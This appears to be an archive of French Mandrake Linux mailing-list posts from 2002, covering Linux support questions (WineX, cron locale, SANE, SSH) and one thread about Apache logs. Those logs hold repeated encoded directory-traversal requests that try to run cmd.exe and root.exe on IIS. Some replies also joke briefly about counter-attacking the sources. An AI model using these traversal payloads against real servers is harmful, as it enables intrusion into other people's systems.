PROTECTED] Objet: Re: [Confirme] Attaque d'Apache ? C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt /s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 -
Re: [Confirme] Attaque d'Apache ?
Très sincèrement, je me fous du nom du virus, ce que je sais c'est que moi, il me fais chier grave à la fin... Et je sais que c'est pas une faille pour ma linuxette. Le Dimanche 14 Janvier 2001 10:29, vous avez écrit : c'est un ver je pense genre code red C'est une attaque, il essaye d'exécuter le programme root.exe cmd .. qui justement donne l'équivalent du accès telnet root sur IIS, mais c'est des vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris des trucs de l'an passée et qui sait pas faire la différence avec apache et IIS... au pire, tu peux (en fait tu devrais) faire un recherche du propriétaire de l'adresse et faire une plainte officielle à son ISP (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le compte de ce genre de personne après trois plainte.s -Denis Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : Bonsoir, Les logs d'Apache ci-dessous montrent que des tentatives de recherches de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont celles de France-Télécom. Ce serveur n'était pas censé fournir des pages sur Internet mais seulement en intranet. Il était ouvert sur l'extérieur à des fins de tests. Depuis, je l'ai verrouillé et en ai profité pour installer Bastille. Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou d'une requête normale de FT (je doute) ? Merci pour vos lumières. AF 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] GET /scripts/root.exe?/c+dir HTTP/1.0 404 300 - - 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] GET /MSADC/root.exe?/c+dir HTTP/1.0 404 298 - - 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 308 - - 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/ 1.0 404 339 - - 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn t/s ystem32/cmd.exe?/c+dir HTTP/1.0 404 355 - - 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 321 - - 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 305 - - 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 322 - - Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com; -- Olivier Thauvin-CNRS Service Aeronomie [EMAIL PROTECTED] Téléphone: 01 64 47 43 60 à Verrières (lundi,mercredi et vendredi) 01 44 27 47 59 à Jussieu (Mardi et Jeudi) Service d'Aéronomie Réduit de Verrieres - BP 3 Route des Gatines 91371 Verrieres le Buisson Cedex France Fax:33 (0)1 69 20 29 99 Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] WineX
Merci à tous ceux qui m'avaient répondu pour WineX. J'ai trouvé la solution : chez moi il fallait changer l'option use DGA de 'y' à 'n'. Apparemment, il y a incompatibilité entre DGA et wine pour le moment ... Maintenant, je vais pouvoir tester les jeux Merci encore, Stef Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
[Confirme] langue et crontab
Bonjour, J'ai un problème de langue au niveau de la commande date. Lorsque celle ci est lancée en ligne de commande : date '+%B' j'obtiens : janvier et lorsque celle ci est lancée par crond, j'obtiens la version anglaise: January. Est ce quelqu'un peut me dire d'ou ça vient ? Car en fait, mon script est censé transcrire des centaines de date dans des fichiers ... Merci d'avance. Cordialement, Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] langue et crontab
Le Lundi 14 Janvier 2002 17:03, vous avez écrit : Bonjour, J'ai un problème de langue au niveau de la commande date. Lorsque celle ci est lancée en ligne de commande : date '+%B' j'obtiens : janvier et lorsque celle ci est lancée par crond, j'obtiens la version anglaise: January. Est ce quelqu'un peut me dire d'ou ça vient ? Car en fait, mon script est censé transcrire des centaines de date dans des fichiers ... Merci d'avance. Cordialement, ajoute seulement au debut de ton script une ou plusieurs lignes pour initialiser tes variables locales: LANG=fr voire LC_MESSAGES=fr_FR et LC_TIME=fr_FR bye jipe -- The pure and simple truth is rarely pure and never simple. Oscar Wilde Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
[Confirme] sane-1.0.6
Je cherche à installe sane car ireconnait l'usb-snapscan en natif. L'install de sane-backends se fait sans problème. Le scanner est détecté, le firmware est chargé. scanimage répond. J'essai d'installer sane-frontend [root@athlon650 sane-frontends-1.0.6]# SANE_CONFIG=/usr/local/bin/sane-config LD_LIBRARY_PATH=/usr/local/lib/sane ./configure [...] checking for sane-config... /usr/local/bin/sane-config checking for SANE - version = 1.0.0... no *** Could not run SANE test program, checking why... *** The test program failed to compile or link. See the file config.log for the *** exact error that occured. This usually means SANE was incorrectly installed *** or that you have moved SANE since it was installed. In the latter case, you *** may want to edit the sane-config script: /usr/local/bin/sane-config ** ERROR: Couldn't find SANE libraries (sane-backends). Possible reasons: - sane-backends isn't installed (install sane-backends before sane-frontends - the SANE header files aren't installed (if you installed SANE as RPM make sure you also included the sane-devel RPM) - the SANE libraries can't be found because /usr/local/lib/ isn't searched by the dynamic linker (see INSTALL for details) ** Bien entendu le sane-backends est installé, sane-devel est installé et j'ai rajouté dans mon /etc/ld.so.conf la ligne suivante /usr/local/lib/sane et fait en root ldconfig. Je croyais que ça allait marché et bien non. Quelqu'un à une idée ? Merci. ==°== Pascal MELIN http://www.multimania.com/gemozac http://www.multimania.com/vitagymgemozac17 Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Attaque d'Apache ?
je veux bien, mais en faisant quelques nslookup, je me suis quand même rendu compte que les attaques provenaient de personnes ayant un accès ADSL. Est-ce qu'il n'y aurait pas un mail du style [EMAIL PROTECTED] ?? Le Lundi 14 Janvier 2002 11:19, Michel Parlebas a écrit : Le Lundi 14 Janvier 2002 11:04, Bruno Pinaud a posté : J'avais pensé faire un fichier de 500Mo de zéro et le faire pointer vers les cibles des attaques, ça peut être marrant... (mais ma ligne ADSL risque de ne pas trop aimer) ou alors un shell maison Le Lundi 14 Janvier 2002 10:29, Yves huguenin a écrit : et si on cree betement un fichier qui recherche et qui ferait planter le client, ca pourrait etre bien! Personne n'as d'idee comment le concevoir... Tout ceci ne serait pas bien malin et ne ferait que surcharger encore le réseau Internet... Les attaques mentionnées dans ce thread sont faites par des machines comportant un serveur IIS contaminé et ceci à l'insu de leur propriétaire. Le plus malin serait - si c'est possible - de prévenir le propriétaire de la machine contaminé ou - si ce n'est pas possible - de ne rien faire du tout... -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] sane-1.0.6
Le RPM, ne fonctionne pas? Tu as essayé de lire les README INSTALL README.INSTALL etc., si je me rappellebien, il y a des option à passer dans le script configure dans le genre ./configure --prefix=/ou/tu/installe/le/frondend --prefix_config=/ou/est/le/sane/backend etc... -Denis B Le Lundi 14 Janvier 2002 14:28, vous avez écrit : Je cherche à installe sane car ireconnait l'usb-snapscan en natif. L'install de sane-backends se fait sans problème. Le scanner est détecté, le firmware est chargé. scanimage répond. J'essai d'installer sane-frontend [root@athlon650 sane-frontends-1.0.6]# SANE_CONFIG=/usr/local/bin/sane-config LD_LIBRARY_PATH=/usr/local/lib/sane ./configure [...] checking for sane-config... /usr/local/bin/sane-config checking for SANE - version = 1.0.0... no *** Could not run SANE test program, checking why... *** The test program failed to compile or link. See the file config.log for the *** exact error that occured. This usually means SANE was incorrectly installed *** or that you have moved SANE since it was installed. In the latter case, you *** may want to edit the sane-config script: /usr/local/bin/sane-config ** ERROR: Couldn't find SANE libraries (sane-backends). Possible reasons: - sane-backends isn't installed (install sane-backends before sane-frontends - the SANE header files aren't installed (if you installed SANE as RPM make sure you also included the sane-devel RPM) - the SANE libraries can't be found because /usr/local/lib/ isn't searched by the dynamic linker (see INSTALL for details) ** Bien entendu le sane-backends est installé, sane-devel est installé et j'ai rajouté dans mon /etc/ld.so.conf la ligne suivante /usr/local/lib/sane et fait en root ldconfig. Je croyais que ça allait marché et bien non. Quelqu'un à une idée ? Merci. ==°== Pascal MELIN http://www.multimania.com/gemozac http://www.multimania.com/vitagymgemozac17 Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] VISUALISATION DE FICHIERS UTILISES
Il me semble que lorsque j'utilise gftp, il y a une fentre de logs, en bas o tu vois dfiler les logs et les fichiers en cours de transfert. Essayes, je crois que c'est ce que tu cherches (mais c'est en graphique...). Rosaire Emmanuel Penove wrote: [EMAIL PROTECTED]"> bonsoir tous, juste une question :quel soft permet de visualiser le ou les fichiers en cours de transfert pour un serveur ftp ou http ??ds le sens d'iptraf pour ceux qui connaissent mais avec le nom du fichier en cours d'upload ou download ou de visualisation ?si possible un soft en live et pas un logiciel qui crit ds un fichier de log .. c pour a ptt que je trouve pas!bien vous Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?Rendez-vous sur "http://www.mandrakestore.com"
[Confirme] Flash sur Mandrake 8.1
Depuis que j'ai installé Mandrake 8.1 j'ai de problème avec le lecteur flash média le produit ne marche pas j'ai des problème avec Konqueror, il me dit que le fichier n'est pas du format ELF, avec Mozilla il fonctionnne seulement sur la moitier des sites, avec Netscape (4.x), soit il fonctinne sur la moitier des sites et fait planter netscape... Aujourd'hui je vouslais allé sur hummer.com... et j'ai eu la suprise de voir mon cher flash ne pas marché et ce sur aucun système... le site est entièrement en flash 5. J'ai du utilisé RedHat et ça a fonctionné, alors j'ai eu des doutes, j'ai pris mon vieux p1-133 avec une vielle Debian 2.2r2 que j'ai sortie du grenier, et ça bien fonctionné, j'ai promener mes pénatter sur le site www.flash.com et downloader le dernier flash pour Linux, la version 5 qui date, selon les fichier de février 2001 (donc près d'un an et au moins 7 mois avant la sortie de Mandrake 8.1) j'ai alors appliqué une ancienne méthode de contrôle : ls et voilà le résultat : [root@denis flash_linux]# ls -l * /usr/lib/netscape/plugins/ -rw-r--r--1 denisusers 947992 fév 15 2001 libflashplayer.so -rw-r--r--1 denisusers7380 fév 15 2001 README -rw-r--r--1 denisusers8748 fév 15 2001 ReadMe.htm -rw-r--r--1 denisusers2363 fév 15 2001 ShockwaveFlash.class /usr/lib/netscape/plugins/: total 1668 -rwxr-xr-x1 root root57089 jun 25 2001 cpPack1.jar* -r-xr-xr-x1 root root 756296 aoû 21 06:02 libflashplayer.so* -rwxr-xr-x1 root root 703428 aoû 21 06:02 libnullplugin.so* -rwxr-xr-x1 root root21400 aoû 26 15:41 plugger.so* -r--r--r--1 root root 4139 mai 18 2001 raclass.zip -r-xr-xr-x1 root root 131580 mai 18 2001 rpnp.so* -r-xr-xr-x1 root root 2363 jun 25 2001 ShockwaveFlash.class* Le flash fournis avec Mandrake n'est pas bon :-( Une autre erreur de MS-Linux ! Je commence réellement à me poser des questions. -Denis Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] VISUALISATION DE FICHIERS UTILISES
Le Lundi 14 Janvier 2002 17:49, vous avez écrit : bonsoir à tous, juste une question : quel soft permet de visualiser le ou les fichiers en cours de transfert pour un serveur ftp ou http ?? ds le sens d'iptraf pour ceux qui connaissent mais avec le nom du fichier en cours d'upload ou download ou de visualisation ? si possible un soft en live et pas un logiciel qui écrit ds un fichier de log .. c pour ça ptét que je trouve pas! bien à vous Si le fichier est en cours de transfert, il est en cours d'écriture sur le disque. Tu devrais pouvoir le voir avec la commande lsof Après tu peux faire un filtre pour ne voir que ceux là . Mais ce n'est pas tu temps réèl ! bonne chance CC Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] ip-proto-88 : d'o? ?a vient ??
Le Samedi 12 Janvier 2002 22:02, vous avez écrit : dsol, je croyais que tu parlais de packets en provenance de l'exterieur. c'est hors de mon champ de competence... Mais l, il s'agit bien d'un paquet qui vient de chez moi (213.151.47.254) et qui envoie des brols vers une adresse qui m'est totalement inconnue.. fait un netstat pour savoir quel process envoie des paquets. Essaie aussi ethereal Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] sane-1.0.6
Le Lundi 14 Janvier 2002 20:28, Pascal MELIN a écrit : Je cherche à installe sane car ireconnait l'usb-snapscan en natif. L'install de sane-backends se fait sans problème. Le scanner est détecté, le firmware est chargé. scanimage répond. J'essai d'installer sane-frontend [root@athlon650 sane-frontends-1.0.6]# SANE_CONFIG=/usr/local/bin/sane-config LD_LIBRARY_PATH=/usr/local/lib/sane ./configure [...] checking for sane-config... /usr/local/bin/sane-config checking for SANE - version = 1.0.0... no *** Could not run SANE test program, checking why... *** The test program failed to compile or link. See the file config.log for the *** exact error that occured. This usually means SANE was incorrectly installed *** or that you have moved SANE since it was installed. In the latter case, you *** may want to edit the sane-config script: /usr/local/bin/sane-config ** ERROR: Couldn't find SANE libraries (sane-backends). Possible reasons: - sane-backends isn't installed (install sane-backends before sane-frontends - the SANE header files aren't installed (if you installed SANE as RPM make sure you also included the sane-devel RPM) - the SANE libraries can't be found because /usr/local/lib/ isn't searched by the dynamic linker (see INSTALL for details) ** Bien entendu le sane-backends est installé, sane-devel est installé et j'ai rajouté dans mon /etc/ld.so.conf la ligne suivante /usr/local/lib/sane et fait en root ldconfig. Je croyais que ça allait marché et bien non. Quelqu'un à une idée ? Merci. Première chose : effacer le config.cache présent dans le répertoire des sources du programme. 2 - Ajouter /usr/local/bin dans ton path 3 - Modifier ld.so.conf en ajoutant /usr/local/lib ne pas préciser sane à la fin, puis lancer ldconfig le tout en root 4 - lancer ./configure --prefix=/usr/local cette intruction est de mémoire. 5 - make puis make install Ceci est valable pour une installation à partir des sources et à destination de /usr/local et ça devrait marcher -- Christophe JOSSELIN Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] VISUALISATION DE FICHIERS UTILISES
avec proftpd en tant que serveur ftp, on voit le nom du/des fichier(s) à la ligne en paramètre en faisant ps auxww | grep ftp. Sinon voir avec lsof Le Lundi 14 Janvier 2002 21:41, vous avez écrit : Il me semble que lorsque j'utilise gftp, il y a une fenêtre de logs, en bas où tu vois défiler les logs et les fichiers en cours de transfert. Essayes, je crois que c'est ce que tu cherches (mais c'est en graphique...). Rosaire Emmanuel Penove wrote: bonsoir à tous, juste une question : quel soft permet de visualiser le ou les fichiers en cours de transfert pour un serveur ftp ou http ?? ds le sens d'iptraf pour ceux qui connaissent mais avec le nom du fichier en cours d'upload ou download ou de visualisation ? si possible un soft en live et pas un logiciel qui écrit ds un fichier de log .. c pour ça ptét que je trouve pas! bien à vous Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com; -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Flash sur Mandrake 8.1
Désolé, mais perso je n'ai jamais eu ce genre de pb. La mdk8.1 est fourni avec flash 4. J'ai upgradé ce week-end en flash 5 depuis le site de flash et toujours aucun souci avec netscape ou konqueror. Le Lundi 14 Janvier 2002 21:41, vous avez écrit : Depuis que j'ai installé Mandrake 8.1 j'ai de problème avec le lecteur flash média le produit ne marche pas j'ai des problème avec Konqueror, il me dit que le fichier n'est pas du format ELF, avec Mozilla il fonctionnne seulement sur la moitier des sites, avec Netscape (4.x), soit il fonctinne sur la moitier des sites et fait planter netscape... Aujourd'hui je vouslais allé sur hummer.com... et j'ai eu la suprise de voir mon cher flash ne pas marché et ce sur aucun système... le site est entièrement en flash 5. J'ai du utilisé RedHat et ça a fonctionné, alors j'ai eu des doutes, j'ai pris mon vieux p1-133 avec une vielle Debian 2.2r2 que j'ai sortie du grenier, et ça bien fonctionné, j'ai promener mes pénatter sur le site www.flash.com et downloader le dernier flash pour Linux, la version 5 qui date, selon les fichier de février 2001 (donc près d'un an et au moins 7 mois avant la sortie de Mandrake 8.1) j'ai alors appliqué une ancienne méthode de contrôle : ls et voilà le résultat : [root@denis flash_linux]# ls -l * /usr/lib/netscape/plugins/ -rw-r--r--1 denisusers 947992 fév 15 2001 libflashplayer.so -rw-r--r--1 denisusers7380 fév 15 2001 README -rw-r--r--1 denisusers8748 fév 15 2001 ReadMe.htm -rw-r--r--1 denisusers2363 fév 15 2001 ShockwaveFlash.class /usr/lib/netscape/plugins/: total 1668 -rwxr-xr-x1 root root57089 jun 25 2001 cpPack1.jar* -r-xr-xr-x1 root root 756296 aoû 21 06:02 libflashplayer.so* -rwxr-xr-x1 root root 703428 aoû 21 06:02 libnullplugin.so* -rwxr-xr-x1 root root21400 aoû 26 15:41 plugger.so* -r--r--r--1 root root 4139 mai 18 2001 raclass.zip -r-xr-xr-x1 root root 131580 mai 18 2001 rpnp.so* -r-xr-xr-x1 root root 2363 jun 25 2001 ShockwaveFlash.class* Le flash fournis avec Mandrake n'est pas bon :-( Une autre erreur de MS-Linux ! Je commence réellement à me poser des questions. -Denis -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
[Confirme] Pb connecxion SSH
VOilà un pb irrésolvable . j'éspère pas ... g un pb de connexion : juste à la demande de mot de passe : de chez moi o taf : ok de chez moi chez un ami : ok du taf à chez moi : PAS BON du taf chez mon pote : ok de l'ami chez mmoi : ok de l'ami o taf : ok PKOI CA NE MARCHE PAS ... g effecer les clés pour les regénerer et ça marche tjs entre les autres sauf le PAS BON comme d'hab ... g effacer les cliés en local sur chaacun des postes pourles recrééer et tjs rien ! l'erreur est la suivante : root@towap# ssh [EMAIL PROTECTED] ssh_exchange_identification: Connection closed by remote host ca vous dit kék choz ??? merci de me renseigner au cas où Bien à vous Manu -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi 14 janvier 2002 22:16 À : [EMAIL PROTECTED] Objet : Re: [Confirme] Flash sur Mandrake 8.1 Désolé, mais perso je n'ai jamais eu ce genre de pb. La mdk8.1 est fourni avec flash 4. J'ai upgradé ce week-end en flash 5 depuis le site de flash et toujours aucun souci avec netscape ou konqueror. Le Lundi 14 Janvier 2002 21:41, vous avez écrit : Depuis que j'ai installé Mandrake 8.1 j'ai de problème avec le lecteur flash média le produit ne marche pas j'ai des problème avec Konqueror, il me dit que le fichier n'est pas du format ELF, avec Mozilla il fonctionnne seulement sur la moitier des sites, avec Netscape (4.x), soit il fonctinne sur la moitier des sites et fait planter netscape... Aujourd'hui je vouslais allé sur hummer.com... et j'ai eu la suprise de voir mon cher flash ne pas marché et ce sur aucun système... le site est entièrement en flash 5. J'ai du utilisé RedHat et ça a fonctionné, alors j'ai eu des doutes, j'ai pris mon vieux p1-133 avec une vielle Debian 2.2r2 que j'ai sortie du grenier, et ça bien fonctionné, j'ai promener mes pénatter sur le site www.flash.com et downloader le dernier flash pour Linux, la version 5 qui date, selon les fichier de février 2001 (donc près d'un an et au moins 7 mois avant la sortie de Mandrake 8.1) j'ai alors appliqué une ancienne méthode de contrôle : ls et voilà le résultat : [root@denis flash_linux]# ls -l * /usr/lib/netscape/plugins/ -rw-r--r--1 denisusers 947992 fév 15 2001 libflashplayer.so -rw-r--r--1 denisusers7380 fév 15 2001 README -rw-r--r--1 denisusers8748 fév 15 2001 ReadMe.htm -rw-r--r--1 denisusers2363 fév 15 2001 ShockwaveFlash.class /usr/lib/netscape/plugins/: total 1668 -rwxr-xr-x1 root root57089 jun 25 2001 cpPack1.jar* -r-xr-xr-x1 root root 756296 aoû 21 06:02 libflashplayer.so* -rwxr-xr-x1 root root 703428 aoû 21 06:02 libnullplugin.so* -rwxr-xr-x1 root root21400 aoû 26 15:41 plugger.so* -r--r--r--1 root root 4139 mai 18 2001 raclass.zip -r-xr-xr-x1 root root 131580 mai 18 2001 rpnp.so* -r-xr-xr-x1 root root 2363 jun 25 2001 ShockwaveFlash.class* Le flash fournis avec Mandrake n'est pas bon :-( Une autre erreur de MS-Linux ! Je commence réellement à me poser des questions. -Denis -- Bruno Pinaud Ecole Polytechnique de l'université de Nantes (Polytech' Nantes) Institut de recherche en informatique de Nantes (IRIN) Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
[Confirme] update nautilus ?
salut juste une ch'tite kestion avant de faire des connerie! :) pour updater nautilus vau mieux: 1- recuperer les source cooker et compiler toute les dependance !( long) 2- updater directement via urpmi depuis les rpm cooker (rapide) lequel est le plus sur ? le 1 me durez vous ;) mais c'est long et encore du beta enfin donnez moi votre avis merci za+ moon Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Pb connecxion SSH
Moiais, le Flash SSH marche mal ! 1) As-tu indiqué sur le chez moi que le taf avait le droit d'entrer... 2) Je crois qu'entrer en root, même avec SSH, c'est une quasi-tentative de suicide Denis Le Lundi 14 Janvier 2002 17:20, vous avez écrit : VOilà un pb irrésolvable . j'éspère pas ... g un pb de connexion : juste à la demande de mot de passe : de chez moi o taf : ok de chez moi chez un ami : ok du taf à chez moi : PAS BON du taf chez mon pote : ok de l'ami chez mmoi : ok de l'ami o taf : ok PKOI CA NE MARCHE PAS ... g effecer les clés pour les regénerer et ça marche tjs entre les autres sauf le PAS BON comme d'hab ... g effacer les cliés en local sur chaacun des postes pourles recrééer et tjs rien ! l'erreur est la suivante : root@towap# ssh [EMAIL PROTECTED] ssh_exchange_identification: Connection closed by remote host ca vous dit kék choz ??? merci de me renseigner au cas où Bien à vous Manu -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]De la part de Bruno Pinaud Envoyé : lundi 14 janvier 2002 22:16 À : [EMAIL PROTECTED] Objet : Re: [Confirme] Flash sur Mandrake 8.1 Désolé, mais perso je n'ai jamais eu ce genre de pb. La mdk8.1 est fourni avec flash 4. J'ai upgradé ce week-end en flash 5 depuis le site de flash et toujours aucun souci avec netscape ou konqueror. Le Lundi 14 Janvier 2002 21:41, vous avez écrit : Depuis que j'ai installé Mandrake 8.1 j'ai de problème avec le lecteur flash média le produit ne marche pas j'ai des problème avec Konqueror, il me dit que le fichier n'est pas du format ELF, avec Mozilla il fonctionnne seulement sur la moitier des sites, avec Netscape (4.x), soit il fonctinne sur la moitier des sites et fait planter netscape... Aujourd'hui je vouslais allé sur hummer.com... et j'ai eu la suprise de voir mon cher flash ne pas marché et ce sur aucun système... le site est entièrement en flash 5. J'ai du utilisé RedHat et ça a fonctionné, alors j'ai eu des doutes, j'ai pris mon vieux p1-133 avec une vielle Debian 2.2r2 que j'ai sortie du grenier, et ça bien fonctionné, j'ai promener mes pénatter sur le site www.flash.com et downloader le dernier flash pour Linux, la version 5 qui date, selon les fichier de février 2001 (donc près d'un an et au moins 7 mois avant la sortie de Mandrake 8.1) j'ai alors appliqué une ancienne méthode de contrôle : ls et voilà le résultat : [root@denis flash_linux]# ls -l * /usr/lib/netscape/plugins/ -rw-r--r--1 denisusers 947992 fév 15 2001 libflashplayer.so -rw-r--r--1 denisusers7380 fév 15 2001 README -rw-r--r--1 denisusers8748 fév 15 2001 ReadMe.htm -rw-r--r--1 denisusers2363 fév 15 2001 ShockwaveFlash.class /usr/lib/netscape/plugins/: total 1668 -rwxr-xr-x1 root root57089 jun 25 2001 cpPack1.jar* -r-xr-xr-x1 root root 756296 aoû 21 06:02 libflashplayer.so* -rwxr-xr-x1 root root 703428 aoû 21 06:02 libnullplugin.so* -rwxr-xr-x1 root root21400 aoû 26 15:41 plugger.so* -r--r--r--1 root root 4139 mai 18 2001 raclass.zip -r-xr-xr-x1 root root 131580 mai 18 2001 rpnp.so* -r-xr-xr-x1 root root 2363 jun 25 2001 ShockwaveFlash.class* Le flash fournis avec Mandrake n'est pas bon :-( Une autre erreur de MS-Linux ! Je commence réellement à me poser des questions. -Denis Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur http://www.mandrakestore.com;
Re: [Confirme] Pb connecxion SSH
